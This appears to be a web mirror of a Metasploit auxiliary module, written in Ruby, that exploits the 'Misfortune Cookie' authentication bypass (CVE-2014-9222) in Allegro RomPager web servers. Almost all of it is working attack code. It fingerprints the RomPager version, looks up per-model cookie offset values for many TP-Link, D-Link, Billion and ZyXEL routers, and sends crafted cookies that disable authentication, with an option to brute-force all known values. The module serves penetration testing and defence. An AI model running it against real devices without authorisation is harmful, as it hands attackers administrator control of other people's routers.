Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/auxiliary/admin/http/allegro_rompager_auth_bypass.rb
19612 views
1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5
6
class MetasploitModule < Msf::Auxiliary
7
include Msf::Exploit::Remote::HttpClient
8
include Msf::Auxiliary::Report
9
10
def initialize(info = {})
11
super(
12
update_info(
13
info,
14
'Name' => "Allegro Software RomPager 'Misfortune Cookie' (CVE-2014-9222) Authentication Bypass",
15
'Description' => %q{
16
This module exploits HTTP servers that appear to be vulnerable to the
17
'Misfortune Cookie' vulnerability which affects Allegro Software
18
Rompager versions before 4.34 and can allow attackers to authenticate
19
to the HTTP service as an administrator without providing valid
20
credentials.
21
},
22
'Author' => [
23
'Jon Hart <jon_hart[at]rapid7.com>', # metasploit scanner module
24
'Jan Trencansky <jan.trencansky[at]gmail.com>', # metasploit auxiliary admin module
25
'Lior Oppenheim' # CVE-2014-9222
26
],
27
'References' => [
28
['CVE', '2014-9222'],
29
['URL', 'https://web.archive.org/web/20191006135858/http://mis.fortunecook.ie/'],
30
['URL', 'https://web.archive.org/web/20190207102911/http://mis.fortunecook.ie/misfortune-cookie-suspected-vulnerable.pdf'], # list of likely vulnerable devices
31
['URL', 'https://web.archive.org/web/20190623150837/http://mis.fortunecook.ie/too-many-cooks-exploiting-tr069_tal-oppenheim_31c3.pdf'] # 31C3 presentation with POC
32
],
33
'DisclosureDate' => '2014-12-17',
34
'License' => MSF_LICENSE,
35
'Notes' => {
36
'Stability' => [CRASH_SAFE],
37
'SideEffects' => [IOC_IN_LOGS],
38
'Reliability' => []
39
}
40
)
41
)
42
43
register_options(
44
[
45
OptString.new('TARGETURI', [true, 'URI to test', '/']),
46
], Exploit::Remote::HttpClient
47
)
48
49
register_advanced_options(
50
[
51
Msf::OptBool.new('ForceAttempt', [ false, 'Force exploit attempt for all known cookies', false ]),
52
], Exploit::Remote::HttpClient
53
)
54
end
55
56
def headers
57
{
58
'Referer' => full_uri
59
}
60
end
61
62
# List of known values and models
63
def devices_list
64
known_devices = {
65
:'AZ-D140W' =>
66
{
67
name: 'Azmoon', model: 'AZ-D140W', values: [
68
[107367693, 13]
69
]
70
},
71
:'BiPAC 5102S' =>
72
{
73
name: 'Billion', model: 'BiPAC 5102S', values: [
74
[107369694, 13]
75
]
76
},
77
:'BiPAC 5200' =>
78
{
79
name: 'Billion', model: 'BiPAC 5200', values: [
80
[107369545, 9],
81
[107371218, 21]
82
]
83
},
84
:'BiPAC 5200A' =>
85
{
86
name: 'Billion', model: 'BiPAC 5200A', values: [
87
[107366366, 25],
88
[107371453, 9]
89
]
90
},
91
:'BiPAC 5200GR4' =>
92
{
93
name: 'Billion', model: 'BiPAC 5200GR4', values: [
94
[107367690, 21]
95
]
96
},
97
:'BiPAC 5200SRD' =>
98
{
99
name: 'Billion', model: 'BiPAC 5200SRD', values: [
100
[107368270, 1],
101
[107371378, 3],
102
[107371218, 13]
103
]
104
},
105
:'DSL-2520U' =>
106
{
107
name: 'D-Link', model: 'DSL-2520U', values: [
108
[107368902, 25]
109
]
110
},
111
:'DSL-2600U' =>
112
{
113
name: 'D-Link', model: 'DSL-2600U', values: [
114
[107366496, 13],
115
[107360133, 20]
116
]
117
},
118
:'TD-8616' =>
119
{
120
name: 'TP-Link', model: 'TD-8616', values: [
121
[107371483, 21],
122
[107369790, 17],
123
[107371161, 1],
124
[107371426, 17],
125
[107370211, 5],
126
]
127
},
128
:'TD-8817' =>
129
{
130
name: 'TP-Link', model: 'TD-8817', values: [
131
[107369790, 17],
132
[107369788, 1],
133
[107369522, 25],
134
[107369316, 21],
135
[107369321, 9],
136
[107351277, 20]
137
]
138
},
139
:'TD-8820' =>
140
{
141
name: 'TP-Link', model: 'TD-8820', values: [
142
[107369768, 17]
143
]
144
},
145
:'TD-8840T' =>
146
{
147
name: 'TP-Link', model: 'TD-8840T', values: [
148
[107369845, 5],
149
[107369790, 17],
150
[107369570, 1],
151
[107369766, 1],
152
[107369764, 5],
153
[107369688, 17]
154
]
155
},
156
:'TD-W8101G' =>
157
{
158
name: 'TP-Link', model: 'TD-W8101G', values: [
159
[107367772, 37],
160
[107367808, 21],
161
[107367751, 21],
162
[107367749, 13],
163
[107367765, 25],
164
[107367052, 25],
165
[107365835, 1]
166
]
167
},
168
:'TD-W8151N' =>
169
{
170
name: 'TP-Link', model: 'TD-W8151N', values: [
171
[107353867, 24]
172
]
173
},
174
:'TD-W8901G' =>
175
{
176
name: 'TP-Link', model: 'TD-W8901G', values: [
177
[107367787, 21],
178
[107368013, 5],
179
[107367854, 9],
180
[107367751, 21],
181
[107367749, 13],
182
[107367765, 25],
183
[107367682, 21],
184
[107365835, 1],
185
[107367052, 25]
186
]
187
},
188
:'TD-W8901GB' =>
189
{
190
name: 'TP-Link', model: 'TD-W8901GB', values: [
191
[107367756, 13],
192
[107369393, 21]
193
]
194
},
195
:'TD-W8901N' =>
196
{
197
name: 'TP-Link', model: 'TD-W8901N', values: [
198
[107353880, 0]
199
]
200
},
201
:'TD-W8951ND' =>
202
{
203
name: 'TP-Link', model: 'TD-W8951ND', values: [
204
[107369839, 25],
205
[107369876, 13],
206
[107366743, 21],
207
[107364759, 25],
208
[107364759, 13],
209
[107364760, 21]
210
]
211
},
212
:'TD-W8961NB' =>
213
{
214
name: 'TP-Link', model: 'TD-W8961NB', values: [
215
[107369844, 17],
216
[107367629, 21],
217
[107366421, 13]
218
]
219
},
220
:'TD-W8961ND' =>
221
{
222
name: 'TP-Link', model: 'TD-W8961ND', values: [
223
[107369839, 25],
224
[107369876, 13],
225
[107364732, 25],
226
[107364771, 37],
227
[107364762, 29],
228
[107353880, 0],
229
[107353414, 36]
230
]
231
},
232
:'P-660R-T3 v3' => # This value works on devices with model P-660R-T3 v3 not P-660R-T3 v3s
233
{
234
name: 'ZyXEL', model: 'P-660R-T3', values: [
235
[107369567, 21]
236
]
237
},
238
:'P-660RU-T3 v2' => # Couldn't verify this
239
{
240
name: 'ZyXEL', model: 'P-660R-T3', values: [
241
[107369567, 21]
242
]
243
},
244
ALL => # Used when `ForceAttempt` === true
245
{ name: 'Unknown', model: 'Forced', values: [] }
246
}
247
# collect all known cookies for a brute force option
248
all_cookies = []
249
known_devices.collect { |_, v| v[:values] }.each do |list|
250
all_cookies += list
251
end
252
known_devices[:ALL][:values] = all_cookies.uniq
253
known_devices
254
end
255
256
def check_response_fingerprint(res, fallback_status)
257
fp = http_fingerprint(response: res)
258
vprint_status("Fingerprint: #{fp}")
259
# ensure the fingerprint at least appears vulnerable
260
if %r{RomPager/(?<version>[\d.]+)} =~ fp
261
vprint_status("#{peer} is RomPager #{version}")
262
if Rex::Version.new(version) < Rex::Version.new('4.34') && /realm="(?<model>.+)"/ =~ fp
263
return model
264
end
265
end
266
fallback_status
267
end
268
269
def run
270
res = send_request_raw(
271
'uri' => normalize_uri(target_uri.path.to_s),
272
'method' => 'GET'
273
)
274
model = check_response_fingerprint(res, Exploit::CheckCode::Detected)
275
if model != Exploit::CheckCode::Detected
276
devices = devices_list[model.to_sym]
277
devices = devices_list[:ALL] if devices.nil? && datastore['ForceAttempt']
278
if !devices.nil?
279
print_good("Detected device:#{devices[:name]} #{devices[:model]}")
280
devices[:values].each do |value|
281
cookie = "C#{value[0]}=#{'B' * value[1]}\x00"
282
res = send_request_raw(
283
'uri' => normalize_uri(target_uri.path.to_s),
284
'method' => 'GET',
285
'headers' => headers.merge('Cookie' => cookie)
286
)
287
if !res.nil? && (res.code <= 302)
288
print_good('Good response, please check host, authentication should be disabled')
289
break
290
else
291
print_error('Bad response')
292
end
293
end
294
else
295
print_error("No matching values for fingerprint #{model}")
296
end
297
else
298
print_error('Unknown device')
299
end
300
end
301
end
302
303